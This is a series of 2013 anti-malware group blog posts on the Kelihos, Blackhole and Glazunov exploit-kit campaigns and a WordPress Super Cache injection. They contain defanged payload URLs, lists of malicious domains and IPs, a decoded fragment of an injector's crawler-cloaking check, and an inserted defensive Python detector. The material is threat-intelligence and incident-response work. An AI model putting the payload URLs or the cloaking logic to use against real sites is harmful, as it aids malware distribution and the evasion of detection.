fmnvbcuebuoyhxgq.ru
rxoebpmmwjgsphyp.ru
elsskgujckxkdqry.ru
pwtbsyitleslzngt.ru
clxpvwfqexkciciu.ru
owyxdqwgvlyndmwr.ru
bkcnxdtvxcjpyobq.ru
nwdvufzkpszkvxxk.ru
zigfmudoxbqehljf.ru
lvishxhsbgoyclva.ru
xhlbffbmicnnxpsk.ru
kvnoygvsciiyrnlp.ru
whqxutzyuwvaijbq.ru
jurlbjnqmycnjoat.ru
vhutmessbhrhonso.ru
huwiddttqzujegjk.ru
tgzqyfhfekefmnuv.ru
rlqglzqqhehmtryd.ru
eystwwslgmwxzqsu.ru
qlvcdbyuturxcusx.ru
dywqzqyouieuojub.ru
pkabphfegwhtnoug.ru
bycojtqkhamhawoj.ru
nkfxfqvofqbuhuuz.ru
axhlltpcxcixsdhv.ru
mjktxpzccvifevpc.ru
yvlcjbweeheoixyj.ru
ljoqjstmgdotqyll.ru
wupyyjwqhozwdpcb.ru
jitnlsxlmbtdzmwf.ru
vuuurusnjxorennj.ru
iiyjdtxigdyuyzcz.ru
utzrdmsexiffrltv.ru
hidifzbettjuadfh.ru
steqvhuhrqsmynoh.ru
fhifzexvhegcjtdx.ru
rsjmnrjedkuvhwfs.ru
ehmbrpusljbmykrn.ru
qsojzcltslhstxnj.ru
dgrxbomayxjhdike.ru
ossgrsfecodjxjhy.ru
bgwutpbwpbcrzthd.ru
nrxcdfhydmlcnoay.ru
zdbnzonswqhjphqh.ru
mrcblkrgikgxxtwc.ru
xdfjryydcfwvkvui.ru
kqhxgmvevducviey.ru

#MalwareMustDie!


Suspension announcement of 97 .RU domains (registered in REGGI.RU) used by Kelihos Crime Group to spread payload via Red Kit Exploit Pack

MalwareMustDie, NPO, during its research activities, follows the suspension of malicious domains as an important milestone in the fight against malware. We also publicly release some of these domain suspensions in "Operation Tango Down" [What is TangoDown?] as a public announcement.

This time we are shutting down the 97 .RU domains used by the payload download servers of the Kelihos Trojan, which was distributed by the Red Kit Exploit Kit. We registered all of the detected payload URLs into URLQuery and, once all the data was registered, summarized the URLs used for infection by automation. We thank URLQuery for providing a good service that is helpful as evidence of crime for the further legal process. In this case we detected 150 infection URLs under 97 .RU domains, some of them served under subdomains. The use of DGA-like randomization for the payload domains is the MO of this distribution.

The Kelihos Trojan was distributed mainly from East European (Ukraine, Latvia, Belarus, Russia) and Asian (Japan, Korea, Taiwan and Hong Kong) servers as the secondary layer, also using hacked machines scattered worldwide.

Verdict of Crime

The current report is the result of a systematic and successful suspension process, with good coordination between MalwareMustDie members and supporters who spotted, analysed and reported the threat, our PICs in the Tango Team (thanks to ‏@DL for the hard work during holiday time), and Group-IB, who performed an excellent coordination of the suspension process with the related Russian registrar (REGGI.RU). Overall the communication and confirmation process took 4+ days.

This wave of the Red Kit Exploit Kit campaign using Kelihos as payload was spotted infecting worldwide; with the help of our Japan team we have strong evidence of this infection effort, as published in Operation Clean-up Japan (OCJP) case #113 here-->>[OCJP-013], on five domestic sites.

The infection payload is as per the real samples captured below:

RedKit Redirection PoC Snapshot:
[1][2][3][4][5]

Based on the payloads above we sought out and collected all of the payload servers for this shutdown.

Tango Information

The payload URLs are in the long list below, which will be followed by another long list of the 97 dismantled domains:

Infection URL data:

// #MalwareMustDie! Kelihos payload URL via RedKit EK Infection
// Reference: http://unixfreaxjp.blogspot.jp/2013/07/ocjp-113redkit-exploit-kitkelihosvia.html
// Detection range: July 1st, 2013 - July 16, 2013
//

// grep rasta*

0 / 3 [7]hxxp://131.155.81.158/rasta01.exe Netherlands 131.155.81.158
0 / 6 [8]hxxp://fuhxodyz.ru/rasta01.exe Belarus 93.125.67.95
0 / 0 [9]hxxp://www.philchor-nb.de/demo/rasta01.exe Germany
0 / 2 [10]hxxp://ikqydkod.ru/rasta01.exe Ukraine 109.251.141.23
0 / 2 [11]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Russian Federation
0 / 6 [12]hxxp://bopefidi.ru/rasta01.exe Russian Federation 2.94.27.238
0 / 2 [13]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 46.119.193.89
0 / 2 [14]hxxp://sojouvyc.ru/rasta01.exe Ukraine 31.128.74.7
0 / 2 [15]hxxp://vadlubiq.ru/rasta01.exe Ukraine 109.162.84.6
0 / 2 [16]hxxp://kazlyjva.ru/rasta01.exe Malaysia 58.26.182.98
0 / 2 [17]hxxp://funfubap.ru/rasta01.exe Taiwan 114.35.239.185
0 / 2 [18]hxxp://goryzcob.ru/rasta01.exe Ukraine 109.87.254.247
0 / 2 [19]hxxp://motbajsi.ru/rasta01.exe Ukraine 91.196.61.56
0 / 6 [20]hxxp://xymkapaq.ru/rasta01.exe Latvia 89.201.53.86
0 / 2 [21]hxxp://hupjiwuc.ru/rasta01.exe Ukraine 195.114.156.254
0 / 6 [22]hxxp://runevfoh.ru/rasta01.exe Ukraine 5.248.34.57
0 / 2 [23]hxxp://virerceb.ru/rasta01.exe Argentina 190.227.181.203
0 / 6 [24]hxxp://xatzyjha.ru/rasta01.exe Taiwan 1.172.233.239
0 / 2 [25]hxxp://makgivus.ru/rasta01.exe Canada 99.250.218.131
0 / 2 [26]hxxp://avryjpet.ru/rasta01.exe Belarus 91.215.178.83
0 / 2 [27]hxxp://kyjaqcoz.ru/rasta01.exe Ukraine 213.231.52.44
0 / 2 [28]hxxp://bopefidi.ru/rasta01.exe Taiwan 111.255.72.1
0 / 6 [29]hxxp://ycsycxyd.ru/rasta01.exe Japan 118.104.77.165
0 / 2 [30]hxxp://gazgowry.ru/rasta01.exe Ukraine 77.122.55.112
0 / 2 [31]hxxp://vetarwep.ru/rasta01.exe Kazakhstan 176.222.169.243
0 / 6 [32]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Bulgaria 95.43.87.30
0 / 6 [33]hxxp://gulaxxax.ru/rasta01.exe Ukraine 31.42.69.61
0 / 6 [34]hxxp://onhugxic.ru/rasta01.exe Kazakhstan 109.239.45.48
0 / 2 [35]hxxp://ahfamzyk.ru/rasta01.exe Ukraine 178.150.33.194
0 / 6 [36]hxxp://sykevked.ru/rasta01.exe Ukraine 151.0.44.52
0 / 6 [37]hxxp://ydhicdor.ru/rasta01.exe Ukraine 78.30.249.126
0 / 1 [38]hxxp://qeisybyg.ru/rasta01.exe Ukraine 109.87.7.53
0 / 2 [39]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 188.231.173.99

// grep userid*


---
#MalwareMustDie! $ date
Tue Jul 16 22:14:11 JST 2013
The domain list and UP IP's as per Fri Jul 19 20:01:00 JST 2013 status during the shutdown process

Again, we thank all friends, entities and supporters for your great cooperation and advice. Analysing and spotting a threat is one thing, but the hardest part is making the threat go down, and better yet, making the individuals responsible for the crime pay what they deserve.

MalwareMustDie will continue every effort to dismantle malware from the internet and to provide every piece of crime evidence found to the related authorities. Your help and support on every investigation will be very much appreciated.

Public announcement by #MalwareMustDie, NPO., 2013. All rights reserved.
Anti CyberCrime Research Group - malwaremustdie.org

#Alert! #Facebook scam emails that will lead you to #Blackhole EK (162.216.18.169, GoDaddy/Linode)

Note: I wrote this post as a quick note to raise awareness of this threat, as a warning for users, and also to be used as a verdict for shutdown purposes, so I am sorry if you do not find any deep analysis this time.

We received tons of Facebook scam emails with three themes: asking you about Facebook password changes, a "Your photo was tagged" notification and a friend request notification. I made snapshots of these three as per below (please click to enlarge the pics):

These emails will trick you into clicking the below malware infection URLs:


What happens after you access those URLs is that you will load the malicious JavaScript at the below URL:

h00p://traditionlagoonresort.com/prodded/televised.js
and you will be redirected to the Blackhole Exploit Kit site here:
h00p://nphscards.com/topic/accidentally-results-stay.php
The browser will look like this upon redirection...

The Blackhole host itself is up and alive at the below domain and NS:

nphscards.com  A  162.216.18.169
nphscards.com NS ns30.domaincontrol.com
nphscards.com NS ns29.domaincontrol.com
You will see a long record of infections from this IP as spotted in URLQuery here-->>[CLICK], pasted below:
It can also be seen in the VirusTotal URL check here-->>[CLICK], pasted below:

Domain and IP Network information:

Below is the information on the registrar and the ISP that provides the IP for this infector:

// Domains & IP registration (for shutdown purposes)
// It is a GoDaddy domain in the Linode network

Domain Name: NPHSCARDS.COM
Registrar: GODADDY.COM, LLC
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS29.DOMAINCONTROL.COM
Name Server: NS30.DOMAINCONTROL.COM
Status: clientDeleteProhibited
Status: clientRenewProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 05-oct-2012
Creation Date: 10-oct-2010
Expiration Date: 10-oct-2013

NetRange: 162.216.16.0 - 162.216.19.255
CIDR: 162.216.16.0/22
OriginAS:
NetName: LINODE-US
NetHandle: NET-162-216-16-0-1
Parent: NET-162-0-0-0-0
NetType: Direct Allocation
RegDate: 2013-06-19
Updated: 2013-06-19
Ref: http://whois.arin.net/rest/net/NET-162-216-16-0-1

OrgName: Linode
OrgId: LINOD
Address: 329 E. Jimmie Leeds Road
Address: Suite A
City: Galloway
StateProv: NJ
PostalCode: 08205
Country: US
RegDate: 2008-04-24
Updated: 2010-08-31
Comment: http://www.linode.com
Ref: http://whois.arin.net/rest/org/LINODE
Yes, we need GoDaddy's cooperation to dismantle this domain to prevent further infection, and Linode's cooperation to clean up the host.

If you are interested in the investigation log, you can fetch it here-->>[Download]

#MalwareMustDie!

"You hacked.. We cracked & You're doomed!" - An IR adventure of an abused "WP Super Cache" plugin for Exploit Kit (Glazunov) infection

"I dedicate this post to our members visiting BlackHat & Def Con 2013, who are helping to present our group in the security community, with deep regret that I could not make it there, no matter how badly I would like to.
Thank you to @hugbomb, @set_abimone and @kafeine for the help in spotting the redirection, EK confirmation and flushing samples, and to @hFireF0X and other Kernel Mode members for helping to figure out and quickly mitigate the new version of ZeroAccess spotted in this threat!"

Background

I was notified of an infection by our team's @hugbomb, and I cleaned the site within 24 hours after clearing my own neck of the woods.. :-)
I made a domestic report here -->>[0day.jp], and this is the post about how the malicious redirection was made.

The nature of the infection is that only IE browsers with Java plugin access are affected, and only on non-direct access. Some parts of the ACL-like logic used in this redirector are still being decoded, so we may be able to report more of the features they use once that is 100% finished. If you meet the accepted conditions, you will be redirected to the Glazunov Exploit Kit to be infected with ZeroAccess/Sirefef malware. I had a hard time confirming this site, so I had to ask many friends to confirm the case and its conditions with some tests. The good thing is that the site's admin is very supportive, asked me to investigate properly, and allowed this post to be published publicly to prevent more infections.

First, we have to be sure WHICH CODE was injected and WHERE:

Is that it?? Nope.. The diff result shows more: during the injection session, the header was also extended with this stuff:

1,9d0
< HTTP/1.1 200 OK
< Date: Mon, 29 Jul 2013 10:24:55 GMT
< Server: Apache
< X-Pingback: h00p://VICTIM.SITE/xmlrpc.php
< "Set-Cookie: stats=446501053769c06c565094b26d26e8ef;
expires=Mon, 29-Jul-2013 13:24:56 GMT"
< Connection: close
< Content-Type: text/html; charset=UTF-8
< Content-Length: 61451
↑Note this: the header now sets a cookie with a stats variable and an expiry date, which does not exist in the normal mode.
OK, let's move on and look carefully at how the breakdown of the injected code goes:

Explanation:

We see the JavaScript-tagged code and the usage of a specific cookie. The user will first be forced to call the landing page of the Glazunov Exploit Kit at the upper URL, then a check of the browser components using PluginDetect (note: version 0.8.1) will be performed, and the condition for the Java exploitation will depend on the detected Java version.

If the Java version is 7, the JNLP-based infection via "buj58i7kc3.jnlp" will be performed; otherwise the direct Jar class "weptblklaadp.nfpmuqaplgapmsrrmnranye.class" of "8.zip", a CVE-2013-1493 JAR exploit, is used. From my previous report here -->>[kernelmode.info] I know the payload is a new type of ZeroAccess / MaxPlus / Sirefef trojan.

Pictures of the infector components and the CVE method used in the Jar (ZIP) infector:

Spotting the infection source

So how could this code be injected? This is the point of this post.
Please see the picture above, in the part marked in red below. It states:

<!-- WP Super Cache is installed but broken. 
The path to wp-cache-phase1.php
in wp-content/advanced-cache.php must be fixed! -->
I confirmed this with the site owner and found that this error was not supposed to happen.

I executed the first stage of checks by going through .htaccess, php.ini, default.php etc., did not find anything suspicious, and went deeper to check that the Apache modules were in place, as well as the web server daemon used.
I went back to .htaccess and found myself staring at these lines:

RewriteCond %{DOCUMENT_ROOT}/wp-content/cache/supercache/%{SERVER_NAME}/$1/index.html -f
RewriteRule ^(.*) "/wp-content/cache/supercache/%{SERVER_NAME}/$1/index.html" [L]

OK, so the WordPress Super Cache plugin is running. Intrigued by the error caused by the same plugin, I dove into the plugin directories:

  :
2013/07/23 00:00 514 advanced-cache.php
2013/07/23 00:00 1,259 wp-cache-base.php
2013/07/23 00:00 2,988 wp-cache-config-sample.php
2013/07/23 00:00 25,524 wp-cache-phase1.php
2013/07/23 00:00 60,553 wp-cache-phase2.php
2013/07/23 00:00 180,031 wp-cache.php
2013/07/23 00:00 52,772 wp-super-cache.pot
:
This is just perfectly strange, since everything was installed on 2012/07/23 at exactly midnight :-)) lame..
Just to be sure, I made a detailed comparison with the original plugin:
I found the size changes, but no differences in the code after I "diff"-ed them.. weird.. Making me think the attacker was restoring things to normal after the injection was stored?

Let's see what we have now: a WP cache plugin error, strange plugin file dates, and injected code.

I went back to the injected code, found that the obfuscation was built with Zend, and used this as the "significant" grep character to find the list of source files of the injection code:

Note: the yellow colour marks the files and their paths; all of them were injected in the first lines, and the green colour marks the similarity found in the Zend framework builder used.

Below is the list of these injectors:

wp-content\advanced-cache.php
wp-content\wp-cache-config.php
victim.site\wp-content\advanced-cache.php
victim.site\wp-content\wp-cache-config.php
And now we know why the error in the top page occurred! :-)

The attacker also injected code into the current WordPress theme used by the victim; again, I pasted the "atahualpa" theme files injected with the malware code:

victim.site\wp-content\themes\atahualpa\comments-paged.php
victim.site\wp-content\themes\atahualpa\comments.php
victim.site\wp-content\themes\atahualpa\footer.php
victim.site\wp-content\themes\atahualpa\functions.php
victim.site\wp-content\themes\atahualpa\index.php
victim.site\wp-content\themes\atahualpa\legacy.comments.php
victim.site\wp-content\themes\atahualpa\searchform.php
Looking closely into each file, we can guess WHEN the attacker replaced these files:

Understanding how the malicious code works..

Well, the code used to inject pages is as per the "safe" code pasted here-->>[PASTEBIN]
The first level of the obfuscation process extracted from the code is here-->>[PASTEBIN]
Note (AGAIN): the code is only for viewing and can't be executed, a.k.a. I "hexed" the code.

Following the decoded one, at the below line numbers you'll see this code:

It shows the regex operation used to grab and replace the original contents and insert the injection code after assembling it with the <BODY and </HTML tags (marked in purple). Note that all of this is made possible by the abuse of the WordPress plugin mentioned.

I tried to decode further manually and found two obfuscation blocks with a similar pattern; each block contains these parts, with the logic below:

Obfuscation block...

Decoder..

Parser of the decoded codes..

Well, the above code is a rough copy-paste from my notepads. All you have to do next is grab the blob of data, modified a bit as those moronz wanted, decode it using the logic seen in the decoder parts, and parse it out.

I tried to follow the flow of the code manually, using only one text editor, but it looks like things went off the rails somewhere.. So I got stuck at the final decode status here -->>[PASTEBIN]

While decoding the blob manually, some interesting results showed up:

Exclusion of the user agents...

$user_agents = array("Google",
    "Slurp",
    "MSNBot",
    "ia_archiver",
    "Yandex",
    "Rambler");   // crawlers that must never see the injected page

Passing of the user-agent to the Exploit Kit URL...

// serve the untouched page if the visitor is a crawler or already carries
// the 'stats' cookie ($_SEVER in the decoded dump is a typo of $_SERVER)
if ((preg_match("/" . implode("|", $user_agents) . "/i",
        $_SERVER['HTTP_USER_AGENT'])) or
    (isset($_COOKIE['stats'])))
At this point I realised that more effort in de-obfuscation would take more time and energy (I would have to do it from the beginning all over again), which I don't have right now, not on weekdays. So I reproduced the injection source script in PHP with a WP server test environment to get the injection code as pasted here, bit by bit in text -->>[PASTEBIN]
Note that the path of the exploit kit and the name of the zip/Jar file have changed. The code is hexed as well.
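The two tells described above, the unexpected Set-Cookie "stats=" header and the cloaking condition that hides the injected block from crawlers and repeat visitors, can be turned into a defender-side check. The script below is an added example, not code from the post or from the plugin; the header lines, page bodies and redirector hostname are constructed samples, and the exact injector regex is assumed to splice one block between <BODY and </HTML.

```python
"""Added example: detect the WP Super Cache style injection from the post by
(1) flagging a 'stats' Set-Cookie header and (2) diffing a clean copy of the
page against the copy served to a normal visitor. Sample data is constructed."""
import difflib
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Crawler user agents the decoded injector excludes (list from the post).
EXCLUDED_USER_AGENTS = ["Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"]
_EXCLUDE_RE = re.compile("|".join(map(re.escape, EXCLUDED_USER_AGENTS)), re.IGNORECASE)


def injector_would_skip(user_agent: str, cookies: dict) -> bool:
    """The decoded condition: crawlers, and visitors already carrying the
    'stats' cookie, get the untouched page; everyone else gets the injection.
    Fetching as a crawler therefore yields a clean baseline to diff against."""
    return bool(_EXCLUDE_RE.search(user_agent)) or "stats" in cookies


def parse_set_cookie(headers: List[str]) -> dict:
    """Collect {name: value} from every Set-Cookie line in a raw header list."""
    jar = {}
    for line in headers:
        name, sep, rest = line.partition(":")
        if sep and name.strip().lower() == "set-cookie":
            pair = rest.strip().split(";", 1)[0]   # drop expires/path attributes
            key, _, value = pair.partition("=")
            jar[key.strip()] = value.strip()
    return jar


def _tokens(html: str) -> List[str]:
    # Split after every '>' so each tag (plus the text after it) is one unit;
    # diffing tag units keeps the reported insertion aligned on tag boundaries.
    return [t for t in re.split(r"(?<=>)", html) if t]


def find_injected_markup(baseline_html: str, served_html: str) -> List[str]:
    """Markup present in the served page but absent from the clean baseline.
    A single spliced block shows up as one 'insert' opcode."""
    a, b = _tokens(baseline_html), _tokens(served_html)
    matcher = difflib.SequenceMatcher(None, a, b, autojunk=False)
    return ["".join(b[j1:j2]) for op, _, _, j1, j2 in matcher.get_opcodes()
            if op in ("insert", "replace")]


@dataclass
class Finding:
    stats_cookie: Optional[str]
    injected: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return self.stats_cookie is not None or bool(self.injected)


def assess(headers: List[str], baseline_html: str, served_html: str) -> Finding:
    """Combine both tells from the post into one verdict."""
    return Finding(stats_cookie=parse_set_cookie(headers).get("stats"),
                   injected=find_injected_markup(baseline_html, served_html))


# Constructed sample data shaped like the diff in the post (not captured traffic;
# 'redirector.invalid' and the cookie value are placeholders).
CLEAN_PAGE = "<html><body><p>Hello</p></body></html>"
SERVED_PAGE = ("<html><body><script src='//redirector.invalid/x.js'></script>"
               "<p>Hello</p></body></html>")
SERVED_HEADERS = [
    "HTTP/1.1 200 OK",
    "Server: Apache",
    "Set-Cookie: stats=0123456789abcdef0123456789abcdef; expires=Mon, 29-Jul-2013 13:24:56 GMT",
    "Content-Type: text/html; charset=UTF-8",
]

if __name__ == "__main__":
    verdict = assess(SERVED_HEADERS, CLEAN_PAGE, SERVED_PAGE)
    print("stats cookie set :", verdict.stats_cookie)
    print("injected markup  :", verdict.injected)
    print("crawler is spared:", injector_would_skip("Mozilla/5.0 (compatible; Googlebot/2.1)", {}))
```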

I will look further to finish decoding this weekend; I hope this writing helps people who got hit by the same threat. Feel free to ask me questions via the comment section of this post.

Additional:

Our members found traces of similar obfuscation, assumed to be from previous attacks. So it is in the wild..

Moral of the Story

This threat is harmful, as harmful and nasty as a rogue Apache module or a rogue web server; WordPress Super Cache provides every tool needed to make the redirection, to control access, and to grab an HTTP request and change & parse it into a malicious one in a snap.. Better yet, it is easy for a hacker to implement. I mean, all they have to do is make sure you have the old version of WP Super Cache (which can be found out by remote/HTTP checks), brute-force (or buy) your (stolen) FTP account (somehow), and things like I posted here will happen. The attacker doesn't even need to hack your Apache modules, and has no need for root permission to replace the web server's system components, thus not leaving many traces (i.e. no .htaccess, no php.ini, no default.php, no strange conf to touch..), and a successful attacker can camouflage their code like a needle in a haystack. And note, this is a real IR case, friends.. a PoC of why we should be more aware of this threat.

I hope all WP users will be as aware of the security risks of the useful plugins they use as they are of their usefulness. Keep your CMS and its plugins updated, change your FTP server password regularly (I don't say often), and your risk of having a hacked server like this will be minimised.

Stay safe friends!

#MalwareMustDie!!

The result on 48hours+ in battle with Kelihos < request for FURTHER block/dismantle cooperation & support. #Tango is going down..

This post is dedicated to many.. so many wonderful individuals involved in the effort to stand against the Kelihos P2P malware infection. This is an example of WHAT CAN BE DONE if InfoSec people gather to fight a malware infection. This report is entirely the effort of a team of members who simply believe in the same dream: to free our internet from malware. We cannot list your (so many) names, but we all know who you are and what you did. Sincere respect and thank you very much. There was a lot of bumpy communication initially; for the tense and rough communication we apologise for every inconvenience. I personally am so happy to live in an era of gentlemen like you! #MalwareMustDie!

As you may have noticed in our Twitter timeline, we are doing our best in the battle with the Kelihos malware scum. Yes, we were haunted by this infection via RedKit Exploit Kits, TDSS, direct spam or via the botnet's self-updating function itself, and this "scum" is still out there, happily-ever-after infecting us; we just cannot accept this fact.

Therefore we executed every possible effort that can be made by a bunch of volunteers of an NPO entity to suppress their growth on the internet. The efforts themselves varied from suspension, sinkholing, DNSBL blocking, VT/URLQuery (+etc) blacklisting and OpenDNS/GoogleDNS blocking, in parallel with a bunch of reports to the regional authorities (CERTs, GroupIB, ISPs, registrars, ICANN, Microsoft) and to various sinkhole entities.

We received great help and support from the people in the entities mentioned above, and with a good delegation of work within our team on Twitter we were able to put up a good fight and achieve some good results within 48 hours+. It is unfair to the people who helped and supported us to see only Twitter as the result, which is why I posted our effort's report here, together with some tips and tricks used in fighting this infection, in our beloved MalwareMustDie blog.

This post is the report of the mentioned effort. Here we go..

1. Stopping the new Kelihos NS based .COM services

By the time we started this effort, Kelihos had started to switch their DNS from name servers matching ns[1-6]."\][a-z]\{7\,8\}\.".RU to .COM TLD domains in the format ns[1-6]."\][a-z]\{7\}\.".COM. We found that all of the domains were released by INTERNET.BS, a registrar well known for being abused by cybercriminals to release their infector domains. With the great help of the very dedicated individuals mentioned above we took these domains (see below) off the internet:

DUSSEVA.COM
BEUHNIM.COM
GULFKAT.COM
ZUNCHER.COM
FLOWSRE.COM
OMBUGEW.COM
WIDERAT.COM
DAVUJUZ.COM
XEXUMYB.COM
KAROZGI.COM
OSIKKID.COM
NIGUCGU.COM
Below is the PoC of the suspension and sinkholing result:

This is how they got onto the internet:

The following is some PoC and hard evidence that the .COM domains Kelihos used are in the extracted database of INTERNET.BS-released domains-->>[PASTEBIN]

2. The dismantling effort of .RU infectors

Currently, the main basis of the Kelihos infection is .RU ccTLD domains. It is very important to suppress their growth in their home base as well. With great coordination and help from GroupIB we made an effort to dismantle another 101 "NEW" .RU weaponized domains, as listed below:

Date: Thu Aug  8 19:54:43 JST 2013

ABJIQFIR.RU,, ns[1-6].karozgi.com
ACXYPZUK.RU,, ns[1-6].karozgi.com
AFEBIRYN.RU,, ns[1-6].karozgi.com
ANGENJEJ.RU,, ns[1-6].karozgi.com
BADMYVOK.RU,, ns[1-6].karozgi.com
BEZGESUK.RU,, ns[1-6].karozgi.com
BITITROJ.RU,, ns[1-6].karozgi.com
BOVEWHAV.RU,, ns[1-6].karozgi.com
BOWRETTI.RU,, ns[1-6].karozgi.com
CICDIWYH.RU,, ns[1-6].karozgi.com
COLYDQEC.RU,, ns[1-6].karozgi.com
CYVWYDJE.RU,, ns[1-6].karozgi.com
DAHADKYZ.RU,, ns[1-6].karozgi.com
DEPCOPUQ.RU,, ns[1-6].karozgi.com
DEQYPPIL.RU,, ns[1-6].karozgi.com
DIICUHXA.RU,, ns[1-6].karozgi.com
EJOPOWOZ.RU,, ns[1-6].karozgi.com
EJQIURMY.RU,, ns[1-6].karozgi.com
FITUZVOF.RU,, ns[1-6].karozgi.com
FOJEGGUF.RU,, ns[1-6].karozgi.com
GAJKUKUC.RU,, ns[1-6].karozgi.com
GECAKCEM.RU,, ns[1-6].karozgi.com
GYCBOKUD.RU,, ns[1-6].karozgi.com
HURVINEV.RU,, ns[1-6].karozgi.com
HUZNEJEX.RU,, ns[1-6].karozgi.com
HYNEQREL.RU,, ns[1-6].karozgi.com
IMKYHTUG.RU,, ns[1-6].karozgi.com
IPXYJYOQ.RU,, ns[1-6].karozgi.com
ITWILMEP.RU,, ns[1-6].karozgi.com
IWKYXSEZ.RU,, ns[1-6].karozgi.com
IXMUTIRI.RU,, ns[1-6].karozgi.com
JAHKUXYV.RU,, ns[1-6].karozgi.com
JEFDYWSO.RU,, ns[1-6].karozgi.com
JIQLIDOX.RU,, ns[1-6].karozgi.com
JOKLASAN.RU,, ns[1-6].karozgi.com
KAPKICOH.RU,, ns[1-6].karozgi.com
KEBWAKQY.RU,, ns[1-6].karozgi.com
KICSIHOP.RU,, ns[1-6].karozgi.com
KIZCIVZE.RU,, ns[1-6].karozgi.com
KUBGYBOH.RU,, ns[1-6].karozgi.com
KYCROTUS.RU,, ns[1-6].karozgi.com
LICLAJLE.RU,, ns[1-6].karozgi.com
LIMJOZEH.RU,, ns[1-6].karozgi.com
LIZECGIJ.RU,, ns[1-6].karozgi.com
LUFRUDET.RU,, ns[1-6].karozgi.com
LUPQUXSE.RU,, ns[1-6].karozgi.com
LYOHGEOF.RU,, ns[1-6].karozgi.com
MAPUHXAF.RU,, ns[1-6].karozgi.com
MOHGOXEB.RU,, ns[1-6].karozgi.com
MYBFABWI.RU,, ns[1-6].karozgi.com
NECUWFEW.RU,, ns[1-6].karozgi.com
NENKUDYF.RU,, ns[1-6].karozgi.com
NICLYCOM.RU,, ns[1-6].karozgi.com
NOJQAVYJ.RU,, ns[1-6].karozgi.com
NORWOLLU.RU,, ns[1-6].karozgi.com
NUKUNNOQ.RU,, ns[1-6].karozgi.com
ONSUGNEM.RU,, ns[1-6].karozgi.com
ORNEVKYC.RU,, ns[1-6].karozgi.com
PEXDAJYP.RU,, ns[1-6].karozgi.com
PIVGEVIT.RU,, ns[1-6].karozgi.com
PIYMNYFA.RU,, ns[1-6].karozgi.com
POWERWIK.RU,, ns[1-6].karozgi.com
PUPUXHEF.RU,, ns[1-6].karozgi.com
PYDAJZYK.RU,, ns[1-6].karozgi.com
QABADPIX.RU,, ns[1-6].karozgi.com
QOFHIRAW.RU,, ns[1-6].karozgi.com
QYSQUWKO.RU,, ns[1-6].karozgi.com
RIFAUTIR.RU,, ns[1-6].karozgi.com
RIZIKCUG.RU,, ns[1-6].karozgi.com
ROVSYMWO.RU,, ns[1-6].karozgi.com
RYTEOPBY.RU,, ns[1-6].karozgi.com
SAWSOBCY.RU,, ns[1-6].karozgi.com
SOMOXBET.RU,, ns[1-6].karozgi.com
TAFIBCUM.RU,, ns[1-6].karozgi.com
TAZGYVAX.RU,, ns[1-6].karozgi.com
TITGOQTE.RU,, ns[1-6].karozgi.com
TYZFOWFE.RU,, ns[1-6].karozgi.com
UWPAYTNU.RU,, ns[1-6].karozgi.com
VEFLOHGY.RU,, ns[1-6].karozgi.com
VEKDEGYL.RU,, ns[1-6].karozgi.com
VUZNIQIK.RU,, ns[1-6].karozgi.com
VYFUXTIS.RU,, ns[1-6].karozgi.com
WANZAWBY.RU,, ns[1-6].karozgi.com
WODYFWOD.RU,, ns[1-6].karozgi.com
WORLIPXO.RU,, ns[1-6].karozgi.com
XAKRYXOG.RU,, ns[1-6].karozgi.com
XIMIRSEX.RU,, ns[1-6].karozgi.com
XIMXAMLI.RU,, ns[1-6].karozgi.com
XUGNEMYQ.RU,, ns[1-6].karozgi.com
YFKYTXIX.RU,, ns[1-6].karozgi.com
YFXIGUSO.RU,, ns[1-6].karozgi.com
YGXEYVXI.RU,, ns[1-6].karozgi.com
YJSEYGFY.RU,, ns[1-6].karozgi.com
YWHYIWDY.RU,, ns[1-6].karozgi.com
ZADNAZVO.RU,, ns[1-6].karozgi.com
ZUNCUHAK.RU,, ns[1-6].karozgi.com
ZUVNENAX.RU,, ns[1-6].karozgi.com
ZUZVAQAW.RU,, ns[1-6].karozgi.com
ZYHIJWIN.RU,, ns[1-6].karozgi.com
ZYRTYDAJ.RU,, ns[1-6].karozgi.com
These had been weaponized by Kelihos to infect, as the recorded HLUX A records here show:
Date: Fri, 2 Aug 2013 11:43:40 -0700 (PDT)

ABJIQFIR.RU,188.209.251.38,
ACXYPZUK.RU,109.89.137.178,
AFEBIRYN.RU,,
ANGENJEJ.RU,,
BADMYVOK.RU,77.122.196.95,
BEZGESUK.RU,77.122.139.203,
BITITROJ.RU,109.191.82.32,
BOVEWHAV.RU,93.79.91.188,
BOWRETTI.RU,,
CICDIWYH.RU,89.229.196.228,
COLYDQEC.RU,46.56.67.7,
CYVWYDJE.RU,190.220.70.5,
DAHADKYZ.RU,178.75.46.67,
DEPCOPUQ.RU,89.149.105.201,
DEQYPPIL.RU,109.87.198.110,
DIICUHXA.RU,95.111.205.207,
EJOPOWOZ.RU,79.112.214.164,
EJQIURMY.RU,188.129.240.79,
FITUZVOF.RU,37.229.99.95,
FOJEGGUF.RU,,
GAJKUKUC.RU,176.37.121.102,
GECAKCEM.RU,77.122.191.111,
GYCBOKUD.RU,176.8.231.155,
HURVINEV.RU,46.237.110.5,
HUZNEJEX.RU,95.65.80.117,
HYNEQREL.RU,94.76.110.237,
IMKYHTUG.RU,37.252.67.195,
IPXYJYOQ.RU,93.79.231.55,
ITWILMEP.RU,,
IWKYXSEZ.RU,178.218.66.19,
IXMUTIRI.RU,109.207.113.126,
JAHKUXYV.RU,46.185.24.210,
JEFDYWSO.RU,93.125.45.196,
JIQLIDOX.RU,109.201.107.204,
JOKLASAN.RU,88.206.28.89,
KAPKICOH.RU,109.207.118.98,
KEBWAKQY.RU,109.251.94.117,
KICSIHOP.RU,77.120.229.169,
KIZCIVZE.RU,86.101.22.28,
KUBGYBOH.RU,77.122.217.253,
KYCROTUS.RU,94.253.45.147,
LICLAJLE.RU,46.33.55.77,
LIMJOZEH.RU,93.126.126.71,
LIZECGIJ.RU,,
LUFRUDET.RU,159.224.76.42,
LUPQUXSE.RU,37.115.91.192,
LYOHGEOF.RU,109.87.162.4,
MAPUHXAF.RU,37.46.226.241,
MOHGOXEB.RU,194.28.4.29,
